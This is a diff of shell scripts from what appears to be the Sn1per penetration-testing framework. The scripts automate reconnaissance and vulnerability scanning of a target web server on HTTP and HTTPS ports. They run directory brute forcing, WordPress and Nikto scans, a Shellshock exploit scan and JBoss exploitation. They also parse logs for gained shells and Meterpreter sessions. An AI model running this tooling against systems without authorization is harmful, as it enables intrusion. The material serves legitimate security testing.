curl --connect-timeout 5 --max-time 10 -I -s -R -X OPTIONS http://$TARGET:$PORT | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port$PORT.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cat $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null | grep generator | cut -d\" -f4 2> /dev/null | tee $LOOT_DIR/web/webgenerator-http-$TARGET-$PORT.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED DISPLAYING COMMENTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cat $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-http-$TARGET-$PORT.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED DISPLAYING SITE LINKS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cat $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null | egrep "\"" | cut -d\" -f2 | grep \/ | sort -u 2> /dev/null | tee $LOOT_DIR/web/weblinks-http-$TARGET-$PORT.txt 2> /dev/null
|
||||
if [ "$WAFWOOF" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED CHECKING FOR WAF $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
wafw00f http://$TARGET:$PORT | tee $LOOT_DIR/web/waf-$TARGET-http-port$PORT.txt 2> /dev/null
|
||||
echo ""
|
||||
fi
|
||||
if [ "$WHATWEB" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING HTTP INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
whatweb -a 3 http://$TARGET:$PORT | tee $LOOT_DIR/web/whatweb-$TARGET-http-port$PORT.raw 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/whatweb-$TARGET-http-port$PORT.raw > $LOOT_DIR/web/whatweb-$TARGET-http-port$PORT.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/whatweb-$TARGET-http-port$PORT.raw 2> /dev/null
|
||||
echo ""
|
||||
fi
|
||||
if [ "$WIG" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING SERVER INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
python3 $PLUGINS_DIR/wig/wig.py -d -q http://$TARGET:$PORT | tee $LOOT_DIR/web/wig-$TARGET-http-$PORT
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wig-$TARGET-http-$PORT > $LOOT_DIR/web/wig-$TARGET-http-$PORT.txt 2> /dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 http://$TARGET:$PORT | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET-$PORT.txt 2> /dev/null
|
||||
curl --connect-timeout 3 -I -s -R http://$TARGET:$PORT | tee $LOOT_DIR/web/headers-http-$TARGET-$PORT.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -I -s -R -L http://$TARGET:$PORT | tee $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 5 -I -s -R -X OPTIONS http://$TARGET:$PORT | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port$PORT.txt 2> /dev/null
|
||||
if [ "$WEBTECH" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
webtech -u http://$TARGET:$PORT | grep \- | cut -d- -f2- | tee $LOOT_DIR/web/webtech-$TARGET-http-port$PORT.txt
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cat $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null | grep generator | cut -d\" -f4 2> /dev/null | tee $LOOT_DIR/web/webgenerator-http-$TARGET-$PORT.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED DISPLAYING COMMENTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cat $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-http-$TARGET-$PORT.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED DISPLAYING SITE LINKS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cat $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null | egrep "\"" | cut -d\" -f2 | grep \/ | sort -u 2> /dev/null | tee $LOOT_DIR/web/weblinks-http-$TARGET-$PORT.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ $CUTYCAPT = "1" ]; then
|
||||
if [ ${DISTRO} == "blackarch" ]; then
|
||||
/bin/CutyCapt --url=http://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
|
|
@ -136,12 +138,12 @@ if [ "$MODE" = "webporthttp" ]; then
|
|||
fi
|
||||
if [ $WEBSCREENSHOT = "1" ]; then
|
||||
cd $LOOT_DIR
|
||||
python $INSTALL_DIR/bin/webscreenshot.py -t 5 http://$TARGET:$PORT
|
||||
python2 $INSTALL_DIR/bin/webscreenshot.py -t 5 http://$TARGET:$PORT
|
||||
fi
|
||||
if [ "$BURP_SCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -X POST \"http://$BURP_HOST:$BURP_PORT/v0.1/scan\" -d \"{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:$PORT\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:$PORT\"]}\"$RESET"
|
||||
fi
|
||||
|
|
@ -149,29 +151,29 @@ if [ "$MODE" = "webporthttp" ]; then
|
|||
echo ""
|
||||
fi
|
||||
if [ "$NMAP_SCRIPTS" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING NMAP SCRIPTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
nmap -A -Pn -T5 -p $PORT -sV --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse,/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners --script=http-vuln* $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port$PORT
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/output/nmap-$TARGET-port$PORT 2> /dev/null > $LOOT_DIR/output/nmap-$TARGET-port$PORT.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/nmap-$TARGET-port$PORT 2> /dev/null
|
||||
fi
|
||||
if [ "$PASSIVE_SPIDER" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$WAYBACKMACHINE" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$BLACKWIDOW" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
touch $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cp $LOOT_DIR/web/spider-$TARGET.txt $LOOT_DIR/web/spider-$TARGET.bak 2>/dev/null
|
||||
blackwidow -u http://$TARGET:$PORT -l 3 -s y -v n 2> /dev/null
|
||||
|
|
@ -189,9 +191,9 @@ if [ "$MODE" = "webporthttp" ]; then
|
|||
touch $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
|
||||
cp $LOOT_DIR/web/dirsearch-$TARGET.txt $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
|
||||
if [ "$WEB_BRUTE_COMMONSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$DIRSEARCH" == "1" ]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e $WEB_BRUTE_EXTENSIONS -f -r -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
|
|
@ -201,9 +203,9 @@ if [ "$MODE" = "webporthttp" ]; then
|
|||
fi
|
||||
fi
|
||||
if [ "$WEB_BRUTE_FULLSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$DIRSEARCH" == "1" ]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_FULL -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
|
|
@ -212,9 +214,9 @@ if [ "$MODE" = "webporthttp" ]; then
|
|||
fi
|
||||
fi
|
||||
if [ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [ "$DIRSEARCH" == "1" ]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
|
|
@ -237,53 +239,53 @@ if [ "$MODE" = "webporthttp" ]; then
|
|||
fi
|
||||
wget http://$TARGET:$PORT/robots.txt -O $LOOT_DIR/web/robots-$TARGET:$PORT-http.txt 2> /dev/null
|
||||
if [ "$CLUSTERD" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
clusterd -i $TARGET -p $PORT | tee $LOOT_DIR/web/clusterd-$TARGET-port$PORT.txt
|
||||
fi
|
||||
if [ "$CMSMAP" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING CMSMAP $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cmsmap http://$TARGET:$PORT | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port$PORTa.txt
|
||||
echo ""
|
||||
cmsmap http://$TARGET/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port$PORTb.txt
|
||||
echo ""
|
||||
fi
|
||||
if [ "$WPSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
wpscan --url http://$TARGET:$PORT --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTa.txt
|
||||
echo ""
|
||||
wpscan --url http://$TARGET:$PORT/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTb.txt
|
||||
echo ""
|
||||
fi
|
||||
if [ "$NIKTO" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
nikto -h http://$TARGET:$PORT -output $LOOT_DIR/web/nikto-$TARGET-http-port$PORT.txt
|
||||
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/nikto-$TARGET-http-port$PORT.txt
|
||||
fi
|
||||
cd $INSTALL_DIR
|
||||
if [ "$CLUSTERD" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
clusterd -i $TARGET -p $PORT 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-http-port$PORT.txt
|
||||
fi
|
||||
if [ "$SHOCKER" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port $PORT | tee $LOOT_DIR/web/shocker-$TARGET-port$PORT.txt
|
||||
fi
|
||||
if [ "$JEXBOSS" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING JEXBOSS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cd /tmp/
|
||||
python /usr/share/sniper/plugins/jexboss/jexboss.py -u http://$TARGET:$PORT | tee $LOOT_DIR/web/jexboss-$TARGET-port$PORT.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port$PORT.raw > $LOOT_DIR/web/jexboss-$TARGET-port$PORT.txt 2> /dev/null
|
||||
|
|
@ -296,11 +298,24 @@ if [ "$MODE" = "webporthttp" ]; then
|
|||
fi
|
||||
source modes/osint_stage_2.sh
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
mv $LOOT_DIR/scans/running-$TARGET-webporthttp.txt $LOOT_DIR/scans/finished-$TARGET-webporthttp.txt 2> /dev/null
|
||||
rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
|
||||
VULNERABLE_METASPLOIT=$(egrep -h -i -s "may be vulnerable|is vulnerable|IKE response with leak|File saved in" $LOOT_DIR/output/msf-$TARGET-*.txt 2> /dev/null)
|
||||
if [ ${#VULNERABLE_METASPLOIT} -ge 5 ]; then
|
||||
echo "$VULNERABLE_METASPLOIT" > $LOOT_DIR/output/vulnerable-metasploit-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
VULNERABLE_SHELLSHOCK=$(egrep -h -i -s "The following URLs appear to be exploitable:" $LOOT_DIR/web/shocker-$TARGET-*.txt 2> /dev/null)
|
||||
if [ ${#VULNERABLE_SHELLSHOCK} -ge 5 ]; then
|
||||
echo "$VULNERABLE_SHELLSHOCK" > $LOOT_DIR/output/vulnerable-shellshock-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
SHELLED=$(egrep -h -i -s "Meterpreter session|Command executed|File(s) found:|Command Stager progress|File uploaded|Command shell session" $LOOT_DIR/output/msf-$TARGET-*.txt 2> /dev/null)
|
||||
if [ ${#SHELLED} -ge 5 ]; then
|
||||
echo "$SHELLED" > $LOOT_DIR/output/shelled-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$LOOT" = "1" ]; then
|
||||
loot
|
||||
fi
|
||||
|
|
|
|||
|
|
@ -4,7 +4,7 @@ if [ "$MODE" = "webporthttps" ]; then
|
|||
if [ ! -z "$WORKSPACE" ]; then
|
||||
args="$args -w $WORKSPACE"
|
||||
LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
|
||||
echo -e "$OKBLUE[*] Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
mkdir -p $LOOT_DIR 2> /dev/null
|
||||
mkdir $LOOT_DIR/domains 2> /dev/null
|
||||
mkdir $LOOT_DIR/screenshots 2> /dev/null
|
||||
|
|
@ -16,6 +16,7 @@ if [ "$MODE" = "webporthttps" ]; then
|
|||
fi
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE -p $PORT --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running-$TARGET-webporthttps.txt
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: https://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
fi
|
||||
|
|
@ -67,9 +68,9 @@ if [ "$MODE" = "webporthttps" ]; then
|
|||
echo -e " ''''$RESET"
|
||||
echo ""
|
||||
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING TCP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
nmap -sV -Pn -p $PORT --open $TARGET -oX $LOOT_DIR/nmap/nmap-https-$TARGET.xml
|
||||
port_https=`grep 'portid="'$PORT'"' $LOOT_DIR/nmap/nmap-https-$TARGET.xml | grep open`
|
||||
if [ -z "$port_https" ];
|
||||
|
|
@ -77,66 +78,67 @@ if [ "$MODE" = "webporthttps" ]; then
|
|||
echo -e "$OKRED + -- --=[Port $PORT closed... skipping.$RESET"
|
||||
else
|
||||
echo -e "$OKORANGE + -- --=[Port $PORT opened... running tests...$RESET"
|
||||
echo "$TARGET" >> $LOOT_DIR/web/webhosts-unsorted.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=10 --tries=1 https://$TARGET:$PORT | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET-$PORT.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -I -s -R https://$TARGET:$PORT | tee $LOOT_DIR/web/headers-https-$TARGET-$PORT.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -I -s -R -L https://$TARGET:$PORT | tee $LOOT_DIR/web/websource-https-$TARGET-$PORT.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 10 -I -s -R -X OPTIONS https://$TARGET:$PORT | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port$PORT.txt 2> /dev/null
|
||||
if [ "$WEBTECH" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
|
||||
